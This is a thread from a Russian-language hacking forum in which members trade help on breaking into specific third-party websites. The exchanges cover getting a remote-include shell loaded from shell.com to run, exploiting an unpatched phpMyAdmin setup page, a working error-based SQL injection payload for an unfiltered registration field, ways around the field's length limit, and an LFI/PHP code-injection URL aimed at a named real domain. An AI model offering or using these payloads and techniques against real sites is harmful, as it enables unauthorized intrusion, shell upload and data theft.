Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    835
    Reputations:
    605
    скорее всего это просто ифрейм а не инклуд
     
    _________________________
  2. Spunoff

    Spunoff New Member

    Joined:
    16 Jan 2012
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Теперь я знаю какой код на странице
    <?php require $page ?>
    т.е это получается инклуд всё-таки...но почему он при
    site.com/page.php=http://shell.com/shell.php показывает шелл, но на моём же хосте?
    Подскажите плиз как залить шелл сюда?

    register_globals=Off
     
    #19802 Spunoff, 15 Mar 2012
    Last edited: 15 Mar 2012
  3. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Скорее всего потомучто выполняеться на твоем хосте?
    Переименуй из php в txt и проверь.
     
  4. Spunoff

    Spunoff New Member

    Joined:
    16 Jan 2012
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    mironich спасибо, помогло:)
     
  5. JorryGo

    JorryGo New Member

    Joined:
    12 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.
    Есть ли возможность получить доступ к бд или залить шелл?
    Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.
    Есть ли вообще известные уязвимости под эту версию?
     
  6. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    https://rdot.org/forum/showpost.php?p=13736&postcount=6

    при mq=off и PHP <= 5.2.13 или PHP <= 5.3.2
    https://rdot.org/forum/showpost.php?p=18082&postcount=20
    или сплоит мага, был раньше здесь http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

    Можно эксплуатировать, как обычный инклуд RFI, LFI.
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
     
  8. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    /thread98525.html
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    блин я же написал

     
  10. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать?
    ввел например туда '1 и он ошибку вывел
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    Вывести данные из базы, в ошибке, вбив в не фильтруемое поле:
    ' and (select 1 from(select count(*), concat(version(), 0x00, floor(rand(0)*2))x РЕАЛЬНАЯ_ТАБЛИЦА group by x)a) or '
     
    _________________________
  12. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    там ограничение 40 символов к сожалению
    там два поля идет уязвимых,
    там идет первое поле 40 символов, второе поле 40 символов, '0', 0); т.е так скорей всего
    'тут первое поле','тут второе','0',0);

    в скрипте ограничение
     
    #19812 CheatXX, 15 Mar 2012
    Last edited: 15 Mar 2012
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    ограничение где именно? в форме, или в обрабатываемом скрипте?
    если первое, то легко обходится, посылкой собственного запроса
    второе к сожалению не обойти
     
    _________________________
  14. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    362
    Likes Received:
    189
    Reputations:
    92
    Попробуй, используя оперу изменить исходный код поля, тем самым убрать ограничение на кол-во символов.
     
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Попробуй разделить запрос как-то =)
     
  16. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    в самом скрипте ограничение
     
  17. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    запрос выглядит как:
    site.ru/generat1.php?src=sitefotos/sitefotos_13153512082010.jpg
    при подмене на
    site.ru/generat1.php?src=site.ru/1.gif выводит картинку.. скрипты и т д не исполняет... что делать?
     
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    CheatXX, попробуй так разделить запросы например :D
    ReV0LVeR,
    ничего кроме раскрытия пути ты не получишь думаю.
     
  19. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    там 140 символов получается, а два поля дают только 80) может кто то сайт посмотреть :rolleyes: ? ссылку в лс скину

    еше 1 поле есть, ограничения нет но выдает:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'accounts group by x)a) or '',0)' at line 1
     
    #19819 CheatXX, 15 Mar 2012
    Last edited: 15 Mar 2012
  20. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    LFI

    А при каких условиях пхп кода и настроек апача удаеться провести такой финт с выполнением пхп кода:
    Code:
    http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&<?php print php_uname();?>
     
Thread Status:
Not open for further replies.